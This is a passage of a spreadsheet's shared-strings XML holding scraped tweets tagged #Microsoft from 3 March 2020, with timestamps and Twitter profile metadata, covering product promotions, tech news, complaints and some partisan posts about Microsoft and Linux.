    <t>Stay up to date with all things #Windows 10 Always On #VPN, #DirectAccess, and more. Join my mailing list! #Microsoft #Windows10 #Win10 #mobility #aovpn https://t.co/0HdUeh60Jr</t>
  </si>
  <si>
    <t>Tue Mar 03 15:03:32 +0000 2020</t>
  </si>
  <si>
    <t>I usually dont do it, but because of you, everything wild and crazy wakes up in me #St. Joseph County   #style #microsoft https://t.co/G6wpTYHB9j</t>
  </si>
  <si>
    <t>{'id': 1234778915966783488, 'id_str': '1234778915966783488', 'name': 'Carla Palmer', 'screen_name': 'betxodima', 'location': 'Mobile, USA', 'description': 'A successful marriage requires falling in love many times, always with the same person', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 20, 'listed_count': 0, 'created_at': 'Tue Mar 03 09:54:36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'http://pbs.twimg.com/profile_images/1234785206600687616/GPOU8SpV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234785206600687616/GPOU8SpV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234778915966783488/1583230745',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</si>
  <si>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15:02:53 +0000 2020</t>
  </si>
  <si>
    <t>#redhat is promoting #microsoft again https://t.co/8ey2o7iB7N so typical...  https://t.co/UO6wFKpZBt</t>
  </si>
  <si>
    <t>Tue Mar 03 15:02:44 +0000 2020</t>
  </si>
  <si>
    <t>#ethereum Price Bounces Back to $230, Fundamental Metrics Increase #aayushjindal #bobsummerwill #charleshoskinson #dannyryan #ethusd #gavinwood #intel #joelubin #jpmorganchase #microsoft #nvidia #ryandaws #serenity #VitalikButerin https://t.co/4ytkDYpRjk https://t.co/6N9EZCHvir</t>
  </si>
  <si>
    <t>Tue Mar 03 15:02:15 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Surface Laptop 3 screens are cracking, some users say #warranty #lemonlaw #MMWA #forthepeople https://t.co/JGoMRQycLs</t>
  </si>
  <si>
    <t>{'id': 1144288551481282560, 'id_str': '1144288551481282560', 'name': 'WarrantyProtectionGroup', 'screen_name': 'WarrantyLawyers', 'location': 'Florida, USA', 'description': 'If you\'re having warranty issues, or if you purchased "a lemon", Morgan &amp; Morgan\'s Warranty Enforcement Group may be able to help! Call us at 1 (844) 570-6886', 'url': 'https://t.co/AoAn3auvda', 'entities': {'url': {'urls': [{'url': 'https://t.co/AoAn3auvda', 'expanded_url': 'https://www.forthepeople.com/breach-of-warranty-lawyers/?utm_source=twitter&amp;utm_medium=practice%20ar', 'display_url': 'forthepeople.com/breach-of-warrâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 19, 'friends_count': 51, 'listed_count': 0, 'created_at': 'Thu Jun 27 16:57:05 +0000 2019', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1225815943131148288/gpXPcI_8_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225815943131148288/gpXPcI_8_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1144288551481282560/1581092271',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</si>
  <si>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15:01:57 +0000 2020</t>
  </si>
  <si>
    <t>Know the How part of the most important device of your life !!
#androidsecurity #monthlysecuritypatches #ios #huawei #google #alphabet #ceo #apple #microsoft #billgates #satyanadela #samsung #oneplus #huawei #xiaomi #android 
 https://t.co/29oZhbAQjG</t>
  </si>
  <si>
    <t>Tue Mar 03 15:01:11 +0000 2020</t>
  </si>
  <si>
    <t>Great to be partnering with companies like #VMware and #Microsoft. We share the same vision: enterprises need a complete view of all security threats, including mobile. It is the dominant computing platform, to understand and manage risk. https://t.co/4wWcZxcba5 #cybersecurity</t>
  </si>
  <si>
    <t>{'id': 251147079, 'id_str': '251147079', 'name': 'ZIMPERIUM', 'screen_name': 'ZIMPERIUM', 'location': 'Dallas, TX', 'description': 'The Leader in Advanced Mobile Threat Defense and Mobile Security.', 'url': 'https://t.co/qUVXqMIDRd', 'entities': {'url': {'urls': [{'url': 'https://t.co/qUVXqMIDRd', 'expanded_url': 'https://www.zimperium.com', 'display_url': 'zimperium.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11032, 'friends_count': 438, 'listed_count': 237, 'created_at': 'Sat Feb 12 14:53:46 +0000 2011', 'favourites_count': 584, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3074,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'http://pbs.twimg.com/profile_images/378800000863924446/fza3gzpI_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000863924446/fza3gzpI_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/251147079/1571953947', 'profile_link_color': '52D1FF',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</si>
  <si>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15:00:32 +0000 2020</t>
  </si>
  <si>
    <t>How to Backup and Restore Sticky Notes in Windows - https://t.co/bssEjycOqC
#StickyNotes #MicrosoftNotes #Microsoft #MSFT #Windows #TechTutorial #TechSupport #HowTo https://t.co/21L2Rbk9WG</t>
  </si>
  <si>
    <t>{'id': 16598005, 'id_str': '16598005', 'name': 'MajorGeeks', 'screen_name': 'majorgeeks', 'location': 'NY, Florida', 'description': "Only the best software on the internet as well as #Windows10 tutorials, videos, and how-to's. Also, we like memes. And Jack Daniels.", 'url': 'https://t.co/g3v1GzOKq6', 'entities': {'url': {'urls': [{'url': 'https://t.co/g3v1GzOKq6', 'expanded_url': 'http://www.majorgeeks.com', 'display_url': 'majorgeeks.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 12860, 'friends_count': 216, 'listed_count': 300, 'created_at': 'Sun Oct 05 02:37:38 +0000 2008', 'favourites_count': 2721, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 21205, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '000011', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/61340262/SALUTE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/61340262/SALUTE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16598005/1481372278', 'profile_link_color': '003300', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '318906', 'profile_text_color': '1E0101', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 15:00:30 +0000 2020</t>
  </si>
  <si>
    <t>Want to migrate file servers or storage solutions share by share retaining the original UNC namespace? Check out our new video on how to achieve that with DFS... https://t.co/B8IQxF0DYG #FileServer #it #Microsoft #Windows #storage #datacenter #emc #sysadmin #ITPro #netapp #WinSrv</t>
  </si>
  <si>
    <t>Tue Mar 03 15:00:01 +0000 2020</t>
  </si>
  <si>
    <t>Leopard selfies and AI can help save the species from extinction via @fabiomoioli #Azure #Microsoft https://t.co/sTnjPms5yE</t>
  </si>
  <si>
    <t>Tue Mar 03 14:58:25 +0000 2020</t>
  </si>
  <si>
    <t>#stockholm #sweden
Save the date: 23rd April 2020.
Agenda and free registration: https://t.co/PknCfpVgPy
Already 50 #Microsoft #partners and #customers have got their free #ticket. Are you ready to board our AI Express ?
#together we ride the #aiexpres...https://t.co/CEKaLobThz</t>
  </si>
  <si>
    <t>{'id': 1067498903841460225, 'id_str': '1067498903841460225', 'name': 'Ashok S', 'screen_name': 'theashoksamal', 'location': 'Stockholm, Sweden', 'description': 'Strategist, Speaker, Leader, Solution Architect (Data &amp; AI) &amp; 100% Technical', 'url': 'https://t.co/oGaLc8Dw5z', 'entities': {'url': {'urls': [{'url': 'https://t.co/oGaLc8Dw5z', 'expanded_url': 'https://www.ashoksamal.com', 'display_url': 'ashoksamal.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 33, 'friends_count': 37, 'listed_count': 1, 'created_at': 'Tue Nov 27 19:22:26 +0000 2018', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 122,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'http://pbs.twimg.com/profile_images/1067499384131198976/NhSPw1Xv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1067499384131198976/NhSPw1Xv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1067498903841460225/1543346812',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</si>
  <si>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14:57:48 +0000 2020</t>
  </si>
  <si>
    <t>Have a new migration project coming up? Leverage this offer from #AvePoint and #Microsoft and take advantage of free migration on net-new #Office365 seats. Get started here: https://t.co/9btNCf4lL0 https://t.co/ikqzfxL9F9</t>
  </si>
  <si>
    <t>{'id': 1535915696, 'id_str': '1535915696', 'name': 'themapleleafgirl', 'screen_name': 'AnanyaMani25', 'location': 'Toronto, Ontario', 'description': 'Passionate about Photography, books, poetry, nature, music, cricket, writing, learning &amp; development, animals.........an OPTIMIST all the way!!!!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 109, 'friends_count': 181, 'listed_count': 2, 'created_at': 'Fri Jun 21 06:51:22 +0000 2013', 'favourites_count': 1990, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 988,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'http://pbs.twimg.com/profile_images/1136984570828640256/gci48jeY_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1136984570828640256/gci48jeY_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1535915696/1559913317',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</si>
  <si>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14:56:52 +0000 2020</t>
  </si>
  <si>
    <t>Today in #Techrights
 https://t.co/shTXgX9Ddb #gnu #linux #epo #microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 14:56:24 +0000 2020</t>
  </si>
  <si>
    <t>Deal Alert! Get both recent #jumanji movies in 4K for $16 via #Microsoft. It is #MoviesAnywhere compatible so will port to #iTunes, #VUDU, #AmazonPrime, #FandangoNOW, or #GooglePlay if you have them linked.
https://t.co/eLzeUFggu0
#movies #streaming #vod @jumanjimovie https://t.co/TYmgPcmZOa</t>
  </si>
  <si>
    <t>{'id': 1382703330, 'id_str': '1382703330', 'name': 'Watch Pass', 'screen_name': 'WatchorPass', 'location': 'Washington, DC', 'description': "Started in 2013, a movie review site specializing in short reviews  for all types of movies with simple advice: watch it, rent it, or don't see it.", 'url': 'https://t.co/F5eJu9p18I', 'entities': {'url': {'urls': [{'url': 'https://t.co/F5eJu9p18I', 'expanded_url': 'http://www.watchorpass.com', 'display_url': 'watchorpass.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 365, 'friends_count': 21, 'listed_count': 3, 'created_at': 'Fri Apr 26 19:40:33 +0000 2013', 'favourites_count': 56, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 540,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'http://pbs.twimg.com/profile_images/3582485556/0daec4525b491244bf47a4dc0e0a62bc_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3582485556/0daec4525b491244bf47a4dc0e0a62bc_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1382703330/1367093926',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</si>
  <si>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14:51:26 +0000 2020</t>
  </si>
  <si>
    <t>Why is Surface Studio so expensive? The base model is more than twice the price of an iMac. Someone at Microsoft needs to go to business school. #PriceGouging #Microsoft #SurfaceStudio #Stupid #Pricing #Why #Tech #Consumer #Apple #iMac #MacvsPC #Business #Fail #Only5Reviews https://t.co/ta6gMc5AzX</t>
  </si>
  <si>
    <t>{'id': 272139755, 'id_str': '272139755', 'name': 'Vtudio', 'screen_name': 'vtudio', 'location': 'Surfers Paradise, Gold Coast', 'description': 'We investigate technology.', 'url': 'https://t.co/hMeps1kjWL', 'entities': {'url': {'urls': [{'url': 'https://t.co/hMeps1kjWL', 'expanded_url': 'http://vtudio.com', 'display_url': 'vtudio.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 690, 'friends_count': 275, 'listed_count': 26, 'created_at': 'Fri Mar 25 22:37:40 +0000 2011', 'favourites_count': 812, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1530,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'http://pbs.twimg.com/profile_images/1202419781430734849/6XKHt3O9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1202419781430734849/6XKHt3O9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/272139755/1524924156',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</si>
  <si>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14:50:34 +0000 2020</t>
  </si>
  <si>
    <t>If you are a Revit user or are planning to use Revit soon... then, this plugin webinar is a must-watch. Definitely worth the time!
#Revit #Microsoft #CAD #BIM
#engineers #architects
https://t.co/UXJ9R0HOme</t>
  </si>
  <si>
    <t>{'id': 40309300, 'id_str': '40309300', 'name': 'Axiom', 'screen_name': 'CADsoftware', 'location': 'Clearwater, FL', 'description': 'Providing software for CAD &amp; BIM users to get repetitive tasks done quickly &amp; easily. Removing some frustration, helping to meet deadlines &amp; get home on time.', 'url': 'http://t.co/t80p7LAuMq', 'entities': {'url': {'urls': [{'url': 'http://t.co/t80p7LAuMq', 'expanded_url': 'http://axiomint.com/', 'display_url': 'axiomint.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1507, 'friends_count': 2613, 'listed_count': 152, 'created_at': 'Fri May 15 19:11:30 +0000 2009', 'favourites_count': 6367, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7199,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'http://pbs.twimg.com/profile_images/1150758001554255872/YycJa54-_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1150758001554255872/YycJa54-_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/40309300/1563812439', 'profile_link_color': '6A93E6',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</si>
  <si>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14:47:17 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft subsidiary #linuxfoundation again rejecting the #gpl -- see last paragraph (as it has done for almost a decade). https://t.co/3hfv2UxJzl</t>
  </si>
  <si>
    <t>Tue Mar 03 14:44:48 +0000 2020</t>
  </si>
  <si>
    <t>The 'new Linux' is hosted by #microsoft 
  https://t.co/zapjPMnA0E 
#deletegithub #github #proprietarysoftware #systemd</t>
  </si>
  <si>
    <t>Tue Mar 03 14:43:58 +0000 2020</t>
  </si>
  <si>
    <t>When #novell signed the #microsoft #patent deal some in #zdnet spoke out against it, condemned Microsoft.
Microsoft then learned it needed to bribe and infiltrate.
It worked.
https://t.co/kHfI2ZJTns</t>
  </si>
  <si>
    <t>Tue Mar 03 14:42:52 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft is not hiding its attacks on #gnu #linux 
It is just infiltrating all the high-profile groups that can speak about it
Then it bribes high-profile people, who also lose interest in the truth (wallet first)
Then the realists &amp;gt;seem&amp;lt; like a minority or vocal 'zealots'</t>
  </si>
  <si>
    <t>Tue Mar 03 14:42:39 +0000 2020</t>
  </si>
  <si>
    <t>Video production on a book release event! 
Event organizer: event_plus_s.a
#event #bookrelease #microsoft #microsoftgreece #jvc #sony #millertripods #zappeion @ Zappeion https://t.co/Kj4HkNZCrY</t>
  </si>
  <si>
    <t>{'id': 134130727, 'id_str': '134130727', 'name': 'Expose Prod', 'screen_name': 'exposeprod', 'location': 'Athens-Greece', 'description': 'Video Production company', 'url': 'https://t.co/FhNeAlQ0O6', 'entities': {'url': {'urls': [{'url': 'https://t.co/FhNeAlQ0O6', 'expanded_url': 'http://www.exposeprod.com', 'display_url': 'exposeprod.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 50, 'friends_count': 133, 'listed_count': 0, 'created_at': 'Sat Apr 17 14:46:01 +0000 2010', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 197, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFF04D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/691371671001759744/Hz_fi9-q_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/691371671001759744/Hz_fi9-q_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/134130727/1355086807', 'profile_link_color': '0099CC',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</si>
  <si>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Tue Mar 03 14:42:35 +0000 2020</t>
  </si>
  <si>
    <t>#Tory MP #BobSeely asked #BT to investigate if #Huawai is using subcontracted slave labour.
He did NOT ask about;
#Amazon
#Nike
#Adidas 
#Nestle
#H&amp;amp;M
#PhilipMorris
#Microsoft
#SportsDirect
#BritishAmericanTobacco
#Apple 
Or the #USPenalSystem</t>
  </si>
  <si>
    <t>{'id': 18697554, 'id_str': '18697554', 'name': 'Masu', 'screen_name': 'Dark_Masu', 'location': 'United Kingdom', 'description': 'Left leaning, hard working, fair minded spin-detesting father of three.\nI may occasionally swear but, unlike austerity, it does not kill people.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1654, 'friends_count': 3108, 'listed_count': 3, 'created_at': 'Tue Jan 06 21:55:28 +0000 2009', 'favourites_count': 2789, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8605,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'http://pbs.twimg.com/profile_images/1346864819/Masu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1346864819/Masu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18697554/1358956343',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</si>
  <si>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Tue Mar 03 14:41:54 +0000 2020</t>
  </si>
  <si>
    <t>Standard Bank Group will move core banking to #Azure - massive win ! #Microsoft #Cloud https://t.co/SAd7d9EgKE</t>
  </si>
  <si>
    <t>{'id': 27679786, 'id_str': '27679786', 'name': 'thavash.eth', 'screen_name': 'Thavash', 'location': 'South Africa', 'description': 'Big Data and AI specialist; Tech enthusiast; Classic Car lover; Views are my own. Warning - during Test Matches i may tweet excessively about cricket.', 'url': 'https://t.co/pzJzD3EeGn', 'entities': {'url': {'urls': [{'url': 'https://t.co/pzJzD3EeGn', 'expanded_url': 'http://thavash.wordpress.com', 'display_url': 'thavash.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 456, 'friends_count': 533, 'listed_count': 17, 'created_at': 'Mon Mar 30 16:57:14 +0000 2009', 'favourites_count': 1541, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3026,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'http://pbs.twimg.com/profile_images/1097194611322355712/ds4bm_9C_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1097194611322355712/ds4bm_9C_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/27679786/1581970764',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</si>
  <si>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Tue Mar 03 14:41:00 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft just canceled two conferences ahead of their major ones https://t.co/pmZKdU2KcL #tech #SankalpIT</t>
  </si>
  <si>
    <t>Tue Mar 03 14:40:36 +0000 2020</t>
  </si>
  <si>
    <t>remember when #java came out and everyone was worried about code obfuscation ? Contrast that with giving access to your actual source code to #github (aka #Microsoft). I could get fired if i suggested that a while back!</t>
  </si>
  <si>
    <t>{'id': 3182929254, 'id_str': '3182929254', 'name': 'Yassin Mohamed', 'screen_name': 'yassinm_tw', 'location': 'Ottawa, Canada', 'description': 'Streaming Analytics Bullshit Artist. Working remote @splunk. Previously @rocanainc. Husband, Father super curious about everything. Views are my own ðŸ¤£', 'url': 'https://t.co/YbkHpd8E1B', 'entities': {'url': {'urls': [{'url': 'https://t.co/YbkHpd8E1B', 'expanded_url': 'http://yassinm.github.io', 'display_url': 'yassinm.github.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 76, 'friends_count': 495, 'listed_count': 3, 'created_at': 'Sat May 02 14:17:35 +0000 2015', 'favourites_count': 1378, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1012,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'http://pbs.twimg.com/profile_images/1200778517866254336/tdlyFA0x_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1200778517866254336/tdlyFA0x_normal.jpg',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</si>
  <si>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14:40:21 +0000 2020</t>
  </si>
  <si>
    <t>You Dont Need to Hire a "True Detective" to Uncover Hidden Broken Links
#brokenlinks #cloudmigration #datamigration #sharepoint #microsoft
https://t.co/pe05hGdOTr</t>
  </si>
  <si>
    <t>{'id': 2548749337, 'id_str': '2548749337', 'name': 'LinkTek', 'screen_name': 'FixYourLinks', 'location': 'Clearwater, Florida', 'description': 'Providing the worldâ€™s leading solution for the management &amp; automatic repair of broken file links in todayâ€™s most common file formats.', 'url': 'http://t.co/gkpCIicoKq', 'entities': {'url': {'urls': [{'url': 'http://t.co/gkpCIicoKq', 'expanded_url': 'http://linktek.com/', 'display_url': 'linktek.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 372, 'friends_count': 1102, 'listed_count': 105, 'created_at': 'Thu Jun 05 20:46:32 +0000 2014', 'favourites_count': 1681, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3945,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'http://pbs.twimg.com/profile_images/1150758547367399424/MyBUqgdR_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1150758547367399424/MyBUqgdR_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2548749337/1563200703',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</si>
  <si>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14:38:36 +0000 2020</t>
  </si>
  <si>
    <t>Director at large of #linuxfoundation is COO of #microsoft #github which might help explain https://t.co/wsuU8yhle7</t>
  </si>
  <si>
    <t>Tue Mar 03 14:37:22 +0000 2020</t>
  </si>
  <si>
    <t>Imagine the hostile environment at a #linuxfoundation board meeting when you don't trust #microsoft 
Director at large is a Microsoft employee who might call you "sexist"
Vice Chair? Former Microsoft manager...
https://t.co/VYSAra4PcK</t>
  </si>
  <si>
    <t>Tue Mar 03 14:35:37 +0000 2020</t>
  </si>
  <si>
    <t>More Microsoft inside "Linux" https://t.co/gIGtrxR5Mk #microsoft #proprietarysoftware passed off as "Linux"</t>
  </si>
  <si>
    <t>Tue Mar 03 14:34:02 +0000 2020</t>
  </si>
  <si>
    <t>Last call for @Microsoft and @Lookout's latest #webinar!
Join them tomorrow at 9am GMT for some unique insights on embracing #smartphones at work, #BYOD, and the #ModernWorkplace,. 
Register here: https://t.co/w2Fp9UcROO
#Microsoft #Lookout #CyberSec https://t.co/oipX8WNoYU</t>
  </si>
  <si>
    <t>Tue Mar 03 14:33:33 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 Users Beware! TrickBots' Prevalence And Conveyance Escalates in Devices https://t.co/f41QpzNYXs #JavaScript #Microsoft #TrickBot https://t.co/offfQTbrU4</t>
  </si>
  <si>
    <t>{'id': 217759544, 'id_str': '217759544', 'name': 'E Hacking News', 'screen_name': 'EHackerNews', 'location': '', 'description': 'E Hacking News is one of the leading IT security news portal delivers news on #security #hacking #Exploit #CyberCrime &amp; #infosec #Hacker. *', 'url': 'http://t.co/nPhPD5aTI4', 'entities': {'url': {'urls': [{'url': 'http://t.co/nPhPD5aTI4', 'expanded_url': 'http://www.ehackingnews.com', 'display_url': 'ehackingnews.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 116342, 'friends_count': 11, 'listed_count': 1434, 'created_at': 'Sat Nov 20 13:04:10 +0000 2010', 'favourites_count': 787, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10636,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'http://pbs.twimg.com/profile_images/980476639363526656/CalHHbQV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/980476639363526656/CalHHbQV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/217759544/1353852625',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</si>
  <si>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14:32:26 +0000 2020</t>
  </si>
  <si>
    <t>Ampere launches new chip built from ground up for cloud workloads https://t.co/NzKGrW5fgy #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 14:31:10 +0000 2020</t>
  </si>
  <si>
    <t>" #BlackDuck was created by a former #Microsoft executive and it engages with Free software projects/companies." 
https://t.co/D5ZFdxNPpI
Black Duck Created by Microsoft Marketing Man as an Anti-GPL Operation, Admits the Management https://t.co/N41pHsTaLb</t>
  </si>
  <si>
    <t>Tue Mar 03 14:31:05 +0000 2020</t>
  </si>
  <si>
    <t>Organisations are waking up to the benefits of business process automation, and #Microsoft are getting in on the act 
https://t.co/tWc6p4Cyco
Core works with our partner @Nintex to offer business process automation that's fast &amp;amp; easy to manage, with clicks not code.</t>
  </si>
  <si>
    <t>{'id': 259824772, 'id_str': '259824772', 'name': 'Core', 'screen_name': 'CoreGB', 'location': 'London', 'description': 'Core is a Microsoft Gold Partner providing consultancy, development and support for SharePoint, Dynamics CRM, Office 365 and Windows Azure.', 'url': 'http://t.co/U3F4PrFUBM', 'entities': {'url': {'urls': [{'url': 'http://t.co/U3F4PrFUBM', 'expanded_url': 'http://core.co.uk', 'display_url': 'core.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1036, 'friends_count': 1966, 'listed_count': 103, 'created_at': 'Wed Mar 02 17:35:54 +0000 2011', 'favourites_count': 563, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5832,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'http://pbs.twimg.com/profile_images/572335212193792000/k1Eiaw3O_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/572335212193792000/k1Eiaw3O_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/259824772/1537963248',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</si>
  <si>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14:30:29 +0000 2020</t>
  </si>
  <si>
    <t>How to Collaborate Better with #Microsoft #Outlook https://t.co/hqMh4dFSdN</t>
  </si>
  <si>
    <t>Tue Mar 03 14:30:07 +0000 2020</t>
  </si>
  <si>
    <t>SAP applications have been used by more than 90% of Fortune 2000 customers. #Microsoft states that #Azure Microsoft Azure is the most advantageous platform for deploying SAP applications. Here are a few reasons why: https://t.co/Fl3ts1hZdK</t>
  </si>
  <si>
    <t>Tue Mar 03 14:30:01 +0000 2020</t>
  </si>
  <si>
    <t>Africas technology start-up scene is vibrant and growing fast, yet there seems to be a short supply of women led startups.    #ATSKGL #IWD2020.  #WomenTechMakers  #stem #microsoft #WomenInSTEM #WomenInScience #100daysofcode https://t.co/BsKUrOUZwr</t>
  </si>
  <si>
    <t>Tue Mar 03 14:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Got questions on which #Microsoft 365 license your business needs? As a Microsoft Gold Cloud Productivity reseller, we've got the chart for you! Inspect it now. https://t.co/MrPFMLWb1C #WorksForBusiness https://t.co/ByAexgRBRr</t>
  </si>
  <si>
    <t>{'id': 176950021, 'id_str': '176950021', 'name': 'Derek Jenkins', 'screen_name': 'Derek_C_Jenkins', 'location': 'San Diego, CA', 'description': 'National Account Manager for Sprint, managing Enterprise business customers headquartered in Southern California.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 84, 'friends_count': 215, 'listed_count': 8, 'created_at': 'Tue Aug 10 21:40:04 +0000 2010', 'favourites_count': 648, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1737,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'http://pbs.twimg.com/profile_images/744960978765283330/v5hi51LW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/744960978765283330/v5hi51LW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/176950021/1466447898',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</si>
  <si>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14:29:58 +0000 2020</t>
  </si>
  <si>
    <t>Be the first to know all the news for the next generation of console! 
Come in store today and Register Your Interest to receive all the information direct to your email!
#Sony
#playstation5 
#Microsoft
#XboxSeriesX https://t.co/2Arduor3c3</t>
  </si>
  <si>
    <t>{'id': 584769014, 'id_str': '584769014', 'name': 'GAME Keighley', 'screen_name': 'GAMEKeighley', 'location': 'Keighley, West Yorkshire, UK', 'description': 'Tweets direct from the GAME store in Keighley. We tweet the juicy stuff that excites us and the deal/bargains we know you love.', 'url': 'https://t.co/9dseonUxBj', 'entities': {'url': {'urls': [{'url': 'https://t.co/9dseonUxBj', 'expanded_url': 'http://www.game.co.uk', 'display_url': 'game.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1062, 'friends_count': 740, 'listed_count': 51, 'created_at': 'Sat May 19 13:47:06 +0000 2012', 'favourites_count': 1399, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13975,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'http://pbs.twimg.com/profile_images/1068044158861012992/6f-NUcfO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1068044158861012992/6f-NUcfO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/584769014/1581607869', 'profile_link_color': 'CC3366',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</si>
  <si>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Tue Mar 03 14:29:57 +0000 2020</t>
  </si>
  <si>
    <t>Free your team from tedious tasks with RPA
Focus on higher-value work by automating your time-consuming manual processes with UI flows (preview), a robotic process automation (RPA) capability of Power Automate.
#microsoft #powerautomate #uiflows #rpa #roboticprocessautomation https://t.co/wfhQzrqqJo</t>
  </si>
  <si>
